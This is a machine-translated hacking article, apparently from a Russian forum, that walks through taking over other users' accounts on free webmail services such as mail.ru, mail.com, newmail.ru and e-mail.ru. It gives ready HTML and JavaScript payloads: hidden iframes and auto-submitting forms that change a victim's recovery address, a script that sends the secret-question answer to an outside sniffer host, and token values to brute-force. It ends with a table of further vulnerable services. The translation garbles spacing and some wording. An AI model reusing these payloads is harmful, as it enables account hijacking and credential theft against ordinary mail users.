This page has been robot translated, sorry for typos if any. Original content here.

ÜBERBLICK ÜBER DIE VULNERABILITÄTEN KOSTENLOSER POSTDIENSTE

Wir beschäftigen uns weiterhin mit Web-Mails. Ich habe ein wenig nach verschiedenen Services für das Hacken gesucht und Ihnen die Ergebnisse vorgestellt. Die Angriffstechnologie bleibt dieselbe: Ein Brief mit einem JavaScript-Code, der beim Öffnen eines Briefs ausgelöst wird, wird an die Adresse eines anderen Benutzers gesendet und ändert die Informationen in den Boxeinstellungen des Benutzers. Es macht keinen Sinn, jeden Server detailliert zu beschreiben, da der Ansatz überall gleich ist, daher werde ich einige Beispiele und am Ende eine Tabelle geben. In den meisten Fällen kann das Hacken als 100% betrachtet werden, mit einigen Annahmen: Der Benutzer muss die Briefe mithilfe der Webschnittstelle lesen. Beim Schreiben der Exploits, die ich von einer Standardplattform geleitet habe, gehe ich zunächst davon aus, dass der Benutzer keine exotischen Betriebssysteme hat JS-Browser deaktiviert

WWW.MAIL.RU

Ich fange mit der Nummer 1 in Russland an. Momentan ist es dank JavaScript und einem Entwicklerfehler möglich, dieses Postfach zu knacken. Ich glaube, dass die Grundprinzipien bekannt sind. Wie bekomme ich ein Passwort? 1 - nicht autorisiert ändern. Es wird nicht funktionieren, Sie müssen die zuvor installierten kennen. 2 - Ändern Sie die geheime Frage und nutzen Sie den Dienst zur Bekämpfung von Amnesie. Funktioniert auch nicht. 3 - Richten Sie Ihre alternative E-Mail-Adresse so ein, dass sie ein neues vom System generiertes Kennwort erhält. Es funktioniert nicht, die letzten beiden oben aufgeführten Optionen haben dasselbe Format und sind auch durch ein Passwort geschützt. Selbst die anderen, die für uns weniger interessant sind, können die Einstellungen (Name, Nachname usw.) nicht mehr ohne Eingabe des aktuellen Passworts geändert werden. Es scheint, dass es keine Optionen gibt. Es gibt jedoch einen solchen sekundären, unauffälligen Bereich "Kontaktinformationen" (ICQ, Website, Telefon, Arbeitsort, Zeitzone usw.). In diesem Abschnitt können Sie auch die Kontakt-E-Mail angeben. Der Trick besteht darin, dass in den Registrierungsinformationen gleichzeitig die alternative Adresse geändert wird, die im Fragebogen eingetragene Adresse, und Sie können jetzt über den Erinnerungsdienst ein Kennwort für die Seife erhalten. Es ist einfach URL: http://win.mail.ru/cgi-bin/anketa?page=2&Email=hacker@antichat.ru Die GET-Methode kann jedoch keine Einstellungen im Feld mail.ru ändern. Daher werde ich die technische Seite des Problems ausführlich beschreiben.

I. Wir senden einen Brief mit einem Code an das erforderliche Kästchen mit einem Code, der einen Rahmen direkt im Briefkörper mit einem Link zu unserer Website generiert. Wenn möglich, sollte das Skript ohne Benutzerinteraktion funktionieren (Klicken, Klicken, Mauszeiger, Laden von Bildern usw.):


 <embed src = "javascript: document.getElementById ('xxx'). innerHTML = '<iframe src = http: //yoursite.yourdomain.ru/yourscript.html> </ iframe>'; this.wav">
 <p id = 'xxx'>
Um die Leistung des Skripts sowie die Maskierung vollständig sicherzustellen, transformieren wir:
 <embed src = "javascript: status = location; document.getElementById ('xxx'). innerHTML = '<iframe src = http: //yoursite.ru/yourscript.html width = 0 height = 0> </ iframe>' ; this.wav "width = 0 height = 0>
 <p id = 'xxx'>
In diesem Formular ersetzen Zeichencodes die Buchstaben im Namen der Javascript- und Iframe-Elemente, und das Mail-Skript filtert sie nicht. Leitungsstatus = Standort; erstellt die Sichtbarkeit einer lokalen URL in der Statusleiste, sodass das Blinken von außen keinen Verdacht hervorruft. Die Breiten- und Höhenattribute sowohl für Frame als auch für Embed werden auf Null gesetzt und machen sie unsichtbar.

Ii. In der Ressource http://yoursite.ru legen wir ein HTML-Dokument mit dem Formular zum Senden der geänderten Daten an den Server mail.ru ab.

Inhalt yourscript.html:
 <form method = "post" action = "http://win.mail.ru/cgi-bin/anketa" name = "anketa"> <br> <br>
 <input type = "hidden" name = "page" value = "2"> <br>
 <input type = "hidden" name = "Email" value = "hacker@antichat.ru"> <br>
 <input type = "hidden" value = "Speichern" name = "Speichern"> <br>
 </ form> <br>
 <script> <br>
 document.anketa.submit (); <br>
 </ script>
Hinweise: Die Arbeit des Client-Teils des Skripts in unveränderter Form ist nur für den IE gewährleistet. Das Versandformular wird an einer separaten Stelle abgelegt, um den Brief zu "entladen".


WWW.MAIL.COM

Nun ein etwas anderer Sicherheitsfehler, zum Beispiel http://mail.com. Wenn Sie den Kennworterinnerungsdienst verwenden, reicht es aus, die richtige Antwort auf die geheime Frage (eine der Optionen) einzugeben, um sie zu erhalten. Wir haben uns also die Aufgabe gestellt, diese Antwort zu erhalten. Das geht leicht. Als ich zu den Eigenschaften des Postfachs ging und die Registrierungsinformationen gescannt habe, habe ich gesehen, dass die Antwort auf die geheime Frage nicht verborgen ist, sodass wir den Wert mithilfe von JavaScript lesen können.

Führen Sie das Skript durch das style- Tag ein.
Adresse der Einstellungsseite: http://mail01.mail.com/scripts/common/genprofile.cgi
Formularname: Profilformular
Der Name des Textfelds mit einer geheimen Antwort: hint_a
Um eine geheime Frage zu stehlen, müssen Sie die Einstellungsseite aufrufen, JavaScript ausführen, den Wert von document.profileform.hint_a.value abrufen und diesen zusammen mit der Umgebungsvariablen REQUEST_UR I an den Sniffer übergeben .

Bereit-Option:
 <style> @import url (javascript: document.getElementById ('out'). innerHTML = "<iframe src = http: //mail01.mail.com/scripts/common/genprofile.cgi name = 'zero'% 6FnLoad = `str = document.zero.profileform.hint_a.value; path = 'http: //zero.h12.ru/stat/capt.php?'; document.zero.location = path + str`> </ iframe>" ); </ style>
 <span id = 'out'> </ span>
In dem generierten Frame mit dem Namen Null wird die Einstellungsseite geladen. Nachdem der Download abgeschlossen ist, führt der OnLoad-Handler das Skript zum Lesen der geheimen Frage aus und sendet dann über denselben Frame die Antwort an den Sniffer. Gehen Sie jetzt einfach zu http://zero.h12.ru/stat/log.php und finden Sie die Informationen, die Sie in der Zeile "Host" benötigen.

WWW.NEWMAIL.RU

Meiner Meinung nach ein ziemlich beliebter Mailer, deshalb werde ich ausführlich darüber berichten. Darüber hinaus ist es viel einfacher, das Konto eines anderen zu erhalten, als es auf den ersten Blick scheint. Sie können dies tun: Senden Sie eine E-Mail mit einem Skript, das nach dem Start die Sitzungs-ID empfängt, die erforderlichen Anforderungen generiert und die Einstellungen für die alternative E-Mail (an die das Kennwort später gesendet wird) sowie die geheime Frage und Antwort ändern. Wenn Sie bei der Erinnerung jedoch eine andere Adresse angeben, wird das Kennwort an diese Adresse gesendet, wenn nur die geheime Antwort richtig ist. Und die folgende Beobachtung: Die Session-ID zum Ändern der Einstellungen kann überhaupt nicht verwendet werden. Außerdem sind alle Tags erlaubt. All dies reduziert den Code auf ein paar Zeilen:
 <iframe src = http: //newmail.ru/users/chpass.dhtml? cp_msg = 1 & cp_quest = FRAGE & cp_answ = ANSWER width = 0 height = 0> </ iframe> 

WWW.E-MAIL.RU

Die Hacking-Methode von e-mail.ru passt etwas nicht in das allgemeine Thema des Artikels, sondern immer noch als E-Mail :) . Wenn ich ein Kennwort von einer Mailbox abrufen musste, habe ich normalerweise mein Konto registriert und begonnen, das System zu untersuchen. Das erste, was mir auffiel, war die Möglichkeit, ein neues Passwort und eine geheime Frage mit einer Antwort festzulegen, ohne das alte Passwort einzugeben. Der übliche Aktionsplan: Überprüfen Sie die Tag-Filterung, erhalten Sie die ID und führen Sie die Anforderung aus. Um die Einstellungen zu ändern, wurde jedoch die spezielle Variable utoken verwendet, die im Hauptteil des Dokuments enthalten ist. Experimentieren mit dem Ändern der Frage und Antwort mit dem zuvor bekannten Befehl:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ kommt zu dem Schluss, dass ID und Cookies nicht erforderlich sind, um die Einstellungen zu ändern. Gleichzeitig wurde nach Beobachtung von utoken festgestellt, dass die vierstellige Hexadezimalzahl nach der E-Mail-Adresse email@e-mail.ru-5a00 in einem sehr engen Bereich liegt. Um eine geheime Frage mit der Antwort auf jede Box zu stellen, die für uns von Interesse ist, müssen Sie alle 7 Optionen durchgehen : 5a00 , 5b00 , 5c00 , 5d00 , 5e00 , 5f00 , 6000 . Wenn die Nummer erraten wird, kommen wir in das richtige Feld.

Hinweise: Im Moment haben sich einige Änderungen ergeben. Der Kennwortwiederherstellungsdienst funktioniert nicht. Daher ist es sinnvoll, ihn sofort zu ändern. Adressänderungseinstellungen wurden ebenfalls geändert:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&u_token=email@e-mail.ru-5c00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ Die Methode funktioniert nicht für immer. Wahrscheinlich ist es immer noch erforderlich, dass der Benutzer von Zeit zu Zeit über das Web zur Post gelangt.

Tabelle mit den Eigenschaften der freien WWW-Server

SERVER Javascript VULNERABILITÄT
www.km.ru
km.ru
img src = Javascript: Ermöglicht das Lesen des Passworts von der Einstellungsseite aus dem Passwortfeld
www.mail.ru
inbox.ru , bk.ru , list.ru ,
src = Javascript einbetten: Sie können die alternative E-Mail-Adresse ändern
www.mail.com
email.com , post.com , myself.com , consultant.com usw.
@ Import-URL (Javascript :); Die Einstellungen zeigen die Antwort auf die geheime Frage.
www.newmail.ru
nm.ru , hotmail.ru , orc.ru , nightmail.ru
Wie auch immer Frage / Antwort lesen / ändern. Passwort ist gültig
www.netman.ru und www.mailgate.ru
gleiche Mailer. etwa 80 Domains
img src = javascript :, style = background: url (javascript :) Sie können die Antwort auf eine geheime Frage stehlen, wenn diese installiert ist. Es ist auch möglich, eine Weiterleitungsadresse festzulegen (Kopien werden nicht gespeichert).
www.yandex.ru OnError, OnLoad Site * .narod.ru löschen (JS ist nicht erforderlich)
www.ukr.net embed src = javasc
ript: diese .wav>
Lesen Sie die Antwort auf Ihre geheime Frage.
www.nextmail.ru
xaker.ru , email.su , russian.ru , students.ru , programist.ru , designer.ru , mail2k.ru ,
embed src = "Javascript: Tauschen / stehlen Sie die geheime Frage
www.hotbox.ru
pochta.ru , pisem.net , fromru.com , land.ru und andere.
In vielerlei Hinsicht Konto löschen
www.rin.ru src = Javascript einbetten: Lesen Sie die geheime Antwort